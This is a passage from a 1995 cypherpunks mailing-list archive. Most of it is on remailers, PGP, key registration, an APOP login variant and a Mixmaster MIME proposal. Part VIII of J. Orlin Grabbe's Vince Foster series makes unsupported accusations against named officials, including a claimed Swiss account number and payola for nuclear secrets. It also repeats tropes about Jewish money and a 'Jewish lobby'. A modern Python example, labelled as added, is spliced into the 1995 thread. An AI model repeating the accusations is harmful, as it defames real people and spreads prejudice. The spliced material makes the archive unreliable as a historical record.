        as a bulwark against the Soviet Union. And anyway, Foster acted
        alone.  And so on, spin control all the way.  Foster, being
        dead, will have nothing to say about his many potential roles.
                                         
        But underneath all this the Powers That Be have begun to 
        comprehend that some of their own have threatened their very 
        survival.  And the Powers That Be are going to clean house with 
        a vengeance.

                        [To be continued]

        

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMA95UGX1Kn9BepeVAQEhHgP/bfzNzLA7vM/g51Tz6OK7OVf6C+oMhFsF
G4/RM4qBUQUxB51YAcQu7RLSxhpolml/kDu2eeEk/AAu5JWG2dLDyOWdnW5ODOJ3
yaY6F4t5CQh2eccAYQegbjsL+2FQ5yO3Lp+pi9jkvAGKLQEUD65QlTOeLfP2xlBV
9j8iz/gFYpg=
=gv8z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 23 Jul 95 17:14:19 PDT
To: cypherpunks@toad.com
Subject: Part VIII: Vince Foster (fwd)
Message-ID: <Pine.SOL.3.91.950723200754.20174C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sun, 23 Jul 1995 20:08:57 -0400 (EDT)
From: KALLISTE@delphi.com
To: bdolan@use.usit.net
Subject: Part VIII: Vince Foster

-----BEGIN PGP SIGNED MESSAGE-----


	   Allegations Regarding Vince Foster, the NSA, and 
		Banking Transactions Spying, Part VIII

		      by J. Orlin Grabbe
	
	Did our former Secretary of Defense Caspar Weinberger,
like Vince Foster, have a Swiss Bank account?  Does he still? 
Is his name on account number KPFBMMBODE at the Union Bank 
of Switzerland?  Was that why Caspar Weinberger, Publisher Emeritus 
at *Forbes*, became so gung-ho to get Jim Norman's article 
*Fostergate* killed?   
	
	What is the relationship between Caspar Weinberger and Vince 
Foster?  

	What does Ron Perelman, an equity owner of *Forbes* and Revlon, 
have to say about all this?  (Is there lipstick all over the Pentagon?)

	Don't get me wrong.  I think the Swiss banking system is the 
finest in the world, and we should ALL have Swiss banking accounts. We 
should ALL have the right to hide our assets from prying eyes.  Just as 
long, of course, as those assets were fairly earned--and they don't 
represent payola from public defense projects.  Or proceeds from the 
sale of *bona fide* national security secrets.  Or payola to keep the 
knowledge of such sales secret.  
       
	Were Caspar Weinberger's Swiss assets simply savings from his
paycheck and profits from his investments?

	Are U.S. nuclear secrets for open sale on the world market
from one of our alleged "allies"?        
	
	Bobby Ray Inman graduated from the Naval War College in 1972, 
became Assistant Chief of Staff for Intelligence of the Pacific Fleet 
in 1973, Director of Naval Intelligence in 1974, Vice Director of the 
Defense Intelligence Agency in 1976, Director of the National Security 
Agency in 1977, and Deputy Director of Central Intelligence under Ronald 
Reagan in 1981.  He left that post in March 1982.  In December 1993 he 
was nominated by Bill Clinton to be Secretary of Defense.
("Bibliography of Bobby Ray Inman," Office of the Press Secretary, 
The White House, December 16, 1993.)

	"After Admiral Inman's announcement that he would not serve 
as Clinton's Defense Secretary, the Hebrew press devoted a fair amount 
of space to the implications of that affair for Israel. . . . Most 
important among these writings were the articles by Amir Oren 
(*Davar*, January 28) and Yoav Karni, published the same day in the 
newly founded weekly *Shishi*. . . . Oren's article in particular
stressed the incompatibility between Inman's past policy
recommendations  and Israeli political aims, especially in regard
to nuclear developments. Both authors, who usually are mildly
critical of Israel's policies but never of its nuclear build-up,
were emphatic in their hostility toward Inman. Furthermore, Oren
discussed in depth Pollard and Israeli espionage in the U.S. as
having something to do with Israeli objections to Inman as a
person and to his policy recommendations." (Israel Shahak,
"Involvement of the pro-Israel lobby in the Inman affair,"
Report No. 133, February 11, 1994.) 

	Shahak goes on to note that:  "When Yoel Markus (*Haaretz*,
December 31, 1993) spoke of the recent 'courtship' of Israel
by various states, he concluded that 'this courtship has nothing
to do with the peace process . . . When the U.S. is being ruled
by an administration as favorably disposed to Israel as the present
one, conviction spreads in every state that the only way to America's
purse leads via Israel.' "

	A chief objection to Inman was he might implement U.S.
inspections of the Israeli nuclear production process at Dimona:

	"Oren mentions a number of reasons why Israel loathed and
feared Inman.  But as the main of those reasons Oren projects the
Israeli expectation that, if appointed the U.S. Defense Secretary,
Inman would be able to put into effect independent American
inspections of Israeli nuclear armaments and their production 
process in Dimona.  It needs to be recalled that by virtue of a
secret agreement with the U.S. reached during the first year of
John F. Kennedy's term of office as president, the U.S. to this
day receives only such information about Israeli nuclear power
as Israel is pleased to convey.  After the Bay of Pigs fiasco
Kennedy needed the support of the 'Jewish lobby'.  In order to
get it, he okayed this curious agreement." (Israel Shahak)

	Shahak cites evidence that much of Israel's nuclear capability 
had been acquired through espionage directed against the U.S. (The
following reference to "Critical Mass" is to a book called *Critical 
Mass* by William E. Burrows and Robert Windrem.)


	"*Yediot Ahronot*'s correspondents Tzadok Yehezkeli and Danny
Sadeh (January 30), write in their review of the book "Critical
Mass" . . . that 'Israel solicits money from wealthy Jews from all over 
the world for financing its nuclear weaponry programs. This fundraising 
drive is directed by a committee comprised of 30 Jewish millionaires'.
 . . . .
  
	"[Tzadok Yehezkeli and Danny Sadeh] write that 'Israel is ever ready 
to launch its nuclear missiles on some 60 to 80 targets. Those targets
include the sites in the Gulf, the capitals of all Arab states, some nuclear 
bases on the territory of the former USSR and some sites in Pakistan'. 
(I am convinced this is accurate.) It means that Israel must very much 
want to obtain the U.S. satellite information about the entire targeted 
area, a not so negligible part of the earth's surface. The existence of a 
so formidable nuclear power in Israel's hands can not be convincingly 
attributed to its own Research and Development efforts nor even to its 
role as a tool of American policies. On the contrary, a nuclear power of 
that magnitude must be presumed to run counter to U.S. imperial interests. 
The only plausible explanation is that Israel has acquired its nuclear 
power with at least some help of its 'Jewish friends' in the U.S.  
Yehezkeli's and Sadeh's information about 'the nuclear bases on the 
territory of the former USSR' fits well with what Geoffrey Aronson,
relying on State Department sources, reveals about the Pollard affair 
("The Christian Science Monitor", January 27). He writes that according 
to 'unanimous response' from these sources, what Pollard has been always 
said to have betrayed, were 'this country's most important secrets', 
namely the 'information relating to U.S. targeting of Soviet nuclear and 
military installations and the capabilities and defenses of these sites'. 
This seems to accord with Israel's global aspirations based on its nuclear 
power. Aronson also quotes his sources to the effect that much of
intelligence passed on by Pollard 'was unusable to the Israelis except as 
bargaining chips and leverage against the United States and other countries' 
interests'.  In view of this fact Aronson conjectures that Pollard's 
intelligence was used by Israel for deals with Moscow consisting of 
'trading nuclear secrets for Soviet Jews'."  (Israel Shahak)
						     
	Shahak goes on to quote Oren with respect to Jonathan
Pollard:  ". . . 'a Navy Intelligence employee, Jonathan Pollard,
was caught red-handed while passing on to Israel precisely this kind 
of information which Inman had decided to withhold from Israel. . . .  
And interpreted likewise as coincidental were the links connecting
Rafi Eitan, then the chief of the 'Office for Scientific Contacts'
(LEKEM), who employed Pollard, with the [Israeli] Defense minister,
Ariel Sharon, who had appointed Eitan and who rushed to Washington
in order to complain against Inman and his orders.'.... Eitan ran
Pollard with the explicit approval of four Defense ministers and 
Prime Ministers, concretely Arens, Rabin, Shamir and Peres.'"

	Rafi Eitan's reward for the Pollard affair?  "After helping
sell Iraqi oil all over the world, he now oversees the Israeli trade
with Cuba" (Shahak).

	Let me ask again: Are U.S. nuclear secrets for open sale on the 
world market from one of our alleged "allies"?  

	Are U.S. nuclear secrets for open sale by the Defense Department 
personnel who allegedly guard them?      

	Why did Mike McCurry, Press Secretary at the White House, spend time 
trying to convince Sarah McClendon, veteran White House journalist, that 
Jim Norman is a fruitcake? 

	If Jim Norman is a liar or a fruit cake, why did an editor at 
*Insight* magazine receive a visit from the Pentagon? Why was Jim Norman's 
in-progress interview with Jack Christie on the USA Radio Network today 
(July 23, 1995) interrupted for reasons of "national security"?  If lying 
is a national security problem, what is Bill Clinton doing in the White 
House?

	Why is it that the sale of *bona fide* national security secrets is 
tolerated, even rewarded with lucrative payments to Swiss accounts, while 
journalistic reports about THE LOOTING AND SALE OF U.S. NUCLEAR SECRETS 
are quashed as "national security"?  Is the Pentagon run by lunatics and 
thieves?

	"We have put our faith in the bomb, and it is the bomb which 
will answer our prayers."--Henry Miller, *The Time of the Assassins*

		    [To be continued]








-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBMJTWX1Kn9BepeVAQG+IgP/TUu5xuMFrovIWwI7obwjIqkXCfY+aDWd
QyBlv3XeLly8QY1Kxc51yYlylrnWgIqlUJwphpBxy5T7YchJvHGxT3uyevVs4mME
sZ7Czh4ulVqX2swAZ8cHs5COjbeu1jtfFEqvKhIaapoHAQ84/AO+4OdXgbiwF/6g
N6mSJ2BQfPE=
=BEom
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 23 Jul 95 20:33:54 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <ac3860f400021004569b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 7/23/95, Robert Hettinga wrote:

>What I mean is, that after you've used Netscape, a web client, to read news
>for a while, you'll start to think about more specialized applications like
>Newswatcher, for instance.

Speaking for myself, of course, I used Newswatcher _before_ using
Netscape's newsreader.

>No, Tim, your mother does *not* wear army boots.  ;-).  I just have several
>friends who recently moved to a TCP net feed and thought they only needed
>Netscape.  That is, until they used Eudora, and/or Newswatcher (preferably
>in its "value added" editions), and switched to them instead for their
>respective purposes.

I've been using Eudora since early on, in 1992, via my Netcom shell
account. And Eudora Pro since it came out. Now I use it on my PPP account,
but the functionality is essentially the same as when I was using a shell
account.

As for Newswatcher, see above. As for other non-Netscape tools, I also have
MacWAIS, Anarchie, TurboGopher, Finger, NCSA Telnet, Talk, etc. I use
specialized tools when the need arises.

But Eudora + Netscape meet most of my Net needs, which are for doing mail,
reading and posting to News, fetching files, checking out Web sites, etc.

I'm not saying this combination meets the needs of everyone, and their
mileage will likely vary, but I do dislike arguments of the flavor: "Ah,
Tim, wait until you learn what a real computer is, wait until you see
what's out there besides Netscape."

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Sun, 23 Jul 95 14:21:46 PDT
To: vtw@vtw.org (voters telecom watch)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507212057.QAA15341@eff.org>
Message-ID: <3012a599.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

OK, OK, OK--

Robbie Westmorland has persuaded me that an action alert before
the bill has been "calendared" could be counterproductive. The reason
is that until the bill is scheduled to come before a committee, many
do not know it exists, and we do not want to tell them! There is a
possibility that the bill might be quietly forgotten about, up to the time
that it is "calendared".


Is there any reason we could not prepare an action alert in advance
to be released immediately when/if it is scheduled to come before
a subcommittee?

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMBKzH/BUQYbUhJh5AQFOYQQAjZoFcyAAvncyuwG/fS76gdVuQp5ZrF/M
sHgRk6sRgOKkl0qLBZKlTD14y00r1LaUXgncdJ81usArj7wV+l38Y10+3YALRtl+
RtyqAdeND4rGLgx940juVbnNzMEC8bq4xQJYHUZSFXSrJmEqw0+CmOuMKPrDn44z
4Dcvhg1n94M=
=tibc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 24 Jul 95 01:36:40 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: big word listing
Message-ID: <8ADC4F8.000300024C.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


AS> >  <process-ID.clock@hostname>password
AS> >
AS> >and sends it to the server as "APOP username 58349485whatever89583449".

AS> Of course, this requires the user password to be stored unencrypted on the
AS> server; which you may not want to do.

  Here's a variation, then: Instead of using process-id.clock to
generate the random stuff for the challenge, have your own (P)RNG make
up a bunch of them ahead of time, calculate the hashes, and store the
challenges and hashes on the server.

  The password file is kept encrypted, and only decrypted to run the
above. You could even do the whole thing by remote access, making up a
batch of id: pairs of challenge/response on one machine, encrypt the
thing and send it to the server via remailer chain.

  The reason for the "stealth" bit is because the locus of control is
moved to the remote machine, which may itself fall prey to attack. So,
the supervisor needs to login as a Mere User (could have several
accounts like this, and/or change them frequently) so as to not leave a
trail of bread crumbs back to the cottage.



 * Long, long ago, in a tagline far far away...
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 23 Jul 95 21:37:28 PDT
To: John Young <cypherpunks@toad.com
Subject: Re: OVR_byt
Message-ID: <199507240435.VAA11139@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 23 Jul 95 21:38:43 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <199507240435.VAA11194@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:36 PM 7/23/95 -0400, Robert Hettinga wrote:
>The reason that Netscape has either built-in news reading or mail reading
>functions is feature creep.  [....]
>  In-line gifs or jpegs (or mpegs or whatever) are integral to
>the function of seeing what's on the web.  So are in-line FTC, Gopher, etc.
>I think.  My opinion about e-mail and news are that they're pretty
>orthogonal to the functionality of a web-browser.  

When you're building software to run portably across a variety of
operating systems with varying levels of multitaskability or brain-damage,
building a big monolith with good modularity inside seems a reasonable
compromise, and it means you don't have to do as much work to define
interfaces that talk to everybody else's cool application program.  Since
URLs are designed to let you point to just about anything, it's real nice
if your browser client can actually do something useful with any URL it
finds.  I think that includes sending mail in response to mailto:s (though
not receiving it; that's really Somebody Else's Problem), and at least
popping up a crude newsreader to read news: URLs.

It would certainly be nicer to have a system that's aggressively tool-based
with obvious interfaces chosen to call other applications if the user
configures them instead of the default app.  On Unix that's usually easy
(fork/exec with some appropriate command-line args and popular data formats);
on Macs it's not too bad; on DOS, well, anyway.  Winsock at least means that
Windows applications have some chance of using the network compatibly at the
same time, which was previously a major annoyance; now it just makes it
harder to use the _Microsoft_ clients along with Netscape and your other
cool apps, but hey.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 23 Jul 95 21:49:29 PDT
To: stewarts@ix.netcom.com
Subject: Re: Government Mandated Keys
Message-ID: <ac38738903021004b440@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:42 PM 7/22/95, Dan Bailey wrote:
>On Wed, 19 Jul 1995 11:39:07 -0700 you wrote:
>
>>At 11:02 AM 7/19/95 PDT, rick hoselton wrote:
>>>I want to register the 1-bit key of "1".  I expect to
>>>send about half my message bits encrypted, the rest will be clear-text.
>>
>>Oh, go ahead, register 0 also.  You'll probably want to switch keys
>>occasionally during sessions.
>
>Actually, why don't we just register our favorite geometric constant,
>pi?  Assuming it's non-repeating, and non-terminating, you're
>guaranteed that whatever key you end up using will be somewhere in pi.

Reasons this won't work:

1. The Real Reason: It's terminally cute, and terminally cute arguments
rarely stand up in court.

2. The Technical Reason: As I recollect, it is unproven that "any sequence
of digits will appear in pi someplace." (It may be expected that any finite
sequence will eventually appear, but I'm unaware of any proof, and I have
reason to suspect such a proof might be impossible.). A wise-ass judge--not
that any court in the rational (or irrational) world would ever deal with
this--could demand proof.

3. The Legalistic Reason: The "key registration" law would likely be
phrased in terms of direct opening of messages, not existential trickery
about "the set of all keys."

I urge that we deal with key registration on more plausible bases than
trickery and sophistry.

(How many keys can dance on the head of a PIN, and all.)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Sun, 23 Jul 95 22:09:55 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: speeding detected by civilians
Message-ID: <m0saFdX-007NLKC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:01 PM 7/13/95 -0700, Vladimir Z. Nuri wrote:
>hate to start another endless thread on speeding limits, but
>this is an interesting privacy anecdote... hope this hasn't
>been posted here.
>
>
>===
>
>From: "Steven M. Horvath" <horvath@comm.mot.com>
>Subject: Speeder's Beware of Vernon Hills, IL.
>To: snet-l <snet-l@world.std.com>
>
>- - -------- FYI------------------FYI--------------------FYI-----------------
>
>Vernon Hills, IL.
>
>Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
>citizens to check out radar guns from the local police department to 
>catch speeders in their community. The radar guns are combined with 
>cameras in order to instantaneously capture the car, license number, and the 
>rate of speed. The citizens can check out the units for a week at a time. The 
>police have stated that they, at this time, will use the data to issue 
>warning letters to the violators.
>
>
>
>
>
>
>- ------- End of Forwarded Message

Actually... this sounds like a GREAT IDEA!!! Do you know how many cops you 
could catch with one of those??? I cannot count the times I've had cops go by
me at speeds in excess of 80 mph without lights or sirens! Everyone ought to 
check one of those things out, catch the cops and turn it in to your local media
establishment!

        Benjamin T. Moore, Jr.
        btmoore@iquest.net
        (Jian #AJF - IRChat) 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMBMV/4SAJOVFNaChAQEO0wf/W8Nudez5Xu6+VqomN6jlE5aKixkNz59M
UTh9y57zRMuYr1sE1abqr90kmANwo6bG8CmOmn1CS9vnGjvhzO4MeJJGfsc3elwT
EMXTJy4Er5DPoswqUehNKghKvoNEvxL0+CUcTVjkMNCrOt6O5oetUq4hzPBKwC8a
G98Mk8uTZ64YpU1IIZQmHaZrUgA0DpV2tDFA3vX4dSxpeKYP0EHmEIeV1jL8kax+
/DQqYYzYaQYGjfA7bAo6d9jBJkjlPqSYiJVnjTKSScqF7ke31nPfNMCC1B+XdhpQ
G7+rDEcyFubj0awwV8liYE7dnM3j0wxAy9hb0fzNINUv5xNjbj3KTA==
=sx7M
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Sun, 23 Jul 95 21:05:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: MOSS and Mixmaster: A Media Type Proposal
In-Reply-To: <9507090007.AA06052@snark.imsi.com>
Message-ID: <199507240403.AAA00248@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:
>>> It would be very, very good if everyone doing secure mail systems of
>>> one sort or another (including PGP integrated mail packages and
>>> remailers) slowly moved forward to the formats described in this
>>> document, which is now a proposed internet standard...

The IESG writes:
> The IESG has approved the following two Internet-Drafts as Proposed
> Standards:
> 
>  1. MIME Object Security Services <draft-ietf-pem-mime-08.txt>
>  2. Security Multiparts for MIME: Multipart/Signed and
>     Multipart/Encrypted
> 	<draft-ietf-pem-sigenc-03.txt>
> 
> These documents are the product of the Privacy-Enhanced Electronic Mail
> Working Group. The IESG contact person is Jeffrey Schiller.
> 
> 
> Technical Summary
> 
> These documents describe a general framework for security within MIME
> (draft-ietf-pem-sigenc-03.txt) and a specific proposal for offering
> Privacy Enhanced Mail services within MIME(draft-ietf-pem-mime-08.txt).
> Support is provided for digital signatures on MIME objects (both simple
> and compound) as well as for confidentiality provided through data
> encryption.

I've spent some time reading these proposed standards, along with parts of
RFCs 1423 and 1590, with an eye to applying them to remailers. I'd like to
get a sanity check and comments before I consider proceeding with submission
to the IETF Media Types review list, etc.

I propose a new Media Type subtype for Mixmaster remailer packets,
"application/mixmaster". (For the purposes of this message, "Mixmaster
remailer packet" refers to a packet generated by a Mixmaster server or client,
and intended for transmission to a Mixmaster server. It does *not* cover
messages generated by a Mixmaster server that are intended for an ultimate
message recipient.) This is intended to be an experimental protocol
for use in the control part of a multipart/encrypted message. 

There is one required parameter, "version", meant to indicate the version
number of the originating Mixmaster software.  In addition, one optional
parameter, "key-id", may be included. If present, this parameter would
indicate the single line key prefix/ID of the public Mix key used to
encrypt (at the outermost layer) the contents of the application/mixmaster
part. This might be used to thoroughly disambiguate decryption options in
the event that the recipient server has more than one currently active
public Mix key.

The application/mixmaster (control) part of the multipart/encrypted message 
would contain the padded list of Mixmaster server hop headers, superencrypted 
at the outermost layer with a public Mix key (presumably, one belonging to the
recipient server). A single decryption of these headers should reveal the
IDEA key used to superencrypt, at the outermost layer, the body part of the
multipart/encrypted message. The application/octet-stream (body) part of the
multipart/encrypted message would contain the list of ultimate recipients of
the remailed message, the text of the message itself, and any additional 
processing instructions to the final Mix server. The latter, body part of
the multipart/encrypted message shall have been encrypted by the originator
using the IDEA key specified in the former, control part.

The contents of the application/mixmaster part should be encoded in
accordance with the standards for application/octet-stream.

(NB: this amounts to a division of the extant Mixmaster packet format 
roughly into a control section and a body ("payload") section.)

Comments ?

-Futplex <futplex@pseudonym.com>
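
The layout proposed in the message above, as an added example that is not part of the original post or of the Mixmaster software: it builds a multipart/encrypted message whose control part is application/mixmaster with the "version" and optional "key-id" parameters, then parses it back and rejects malformed packets. The "protocol" parameter on the outer type follows the Security Multiparts specification as later published (RFC 1847); the function names, the version string, the key ID and the byte strings standing in for ciphertext are constructed assumptions.

```python
"""Added example: application/mixmaster inside multipart/encrypted."""
from email import message_from_bytes
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart

CONTROL_TYPE = "application/mixmaster"      # subtype proposed in the post
BODY_TYPE = "application/octet-stream"      # body part, per the post


def build_packet(control, body, version, key_id=None):
    """Wrap already-encrypted control and body bytes in the proposed layout."""
    outer = MIMEMultipart("encrypted", protocol=CONTROL_TYPE)
    ctl = MIMEApplication(control, "mixmaster")     # base64 transfer encoding
    ctl.set_param("version", version)               # required parameter
    if key_id is not None:
        ctl.set_param("key-id", key_id)             # optional parameter
    outer.attach(ctl)
    outer.attach(MIMEApplication(body))             # application/octet-stream
    return outer.as_bytes()


def parse_packet(raw):
    """Validate the structure and return the parameters and opaque payloads."""
    msg = message_from_bytes(raw)
    if msg.get_content_type() != "multipart/encrypted" or not msg.is_multipart():
        raise ValueError("not a multipart/encrypted message")
    proto = msg.get_param("protocol")
    if not isinstance(proto, str) or proto.lower() != CONTROL_TYPE:
        raise ValueError("protocol parameter is not application/mixmaster")
    parts = msg.get_payload()
    if len(parts) != 2:
        raise ValueError("multipart/encrypted must have exactly two parts")
    ctl, body = parts
    if ctl.get_content_type() != CONTROL_TYPE:
        raise ValueError("first part is not the application/mixmaster control part")
    if body.get_content_type() != BODY_TYPE:
        raise ValueError("second part is not application/octet-stream")
    version = ctl.get_param("version")
    if not isinstance(version, str) or not version:
        raise ValueError("required 'version' parameter is missing")
    return {
        "version": version,
        "key_id": ctl.get_param("key-id"),          # None when absent
        "control": ctl.get_payload(decode=True),    # superencrypted hop headers
        "body": body.get_payload(decode=True),      # IDEA-encrypted payload
    }


if __name__ == "__main__":
    # Constructed stand-ins for ciphertext; no real Mixmaster data.
    raw = build_packet(b"\x01" * 32, b"\x02" * 64, "0.0-example", "0123456789abcdef")
    print(raw.decode("ascii"))
    print(parse_packet(raw))
```

A receiving server with several active keys would use the returned key_id to pick the private key before attempting decryption, which is the disambiguation the optional parameter is meant to provide.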



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 24 Jul 95 07:00:59 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199507241400.HAA24724@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 24 Jul 95 6:07:21 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       *+**********    12:38  99.99%
spook    remailer@spook.alias.net         *--*********    25:21  99.99%
flame    remailer@flame.alias.net         +-++++++++++    57:34  99.99%
replay   remailer@replay.com              *+****++***+    13:12  99.99%
rmadillo remailer@armadillo.com           +++++++++++     49:13  99.99%
crown    mixmaster@kether.alias.net       --+-+++-+--+  1:25:56  99.98%
bsu-cs   nowhere@bsu-cs.bsu.edu           ###*-#*#****    13:47  99.98%
portal   hfinney@shell.portal.com         #######*****     4:03  99.96%
vishnu   mixmaster@vishnu.alias.net       ++*******+**    13:36  99.73%
gondolin mixmaster@gondolin.org           +*----*-----  1:45:44  99.73%
vox      remail@vox.xs4all.nl             .------.--   15:58:51  99.99%
ideath   remailer@ideath.goldenbear.com   ........-.   14:21:20  99.32%
ford     remailer@bi-node.zerberus.de     #-#+#++-**-*    39:46  99.26%
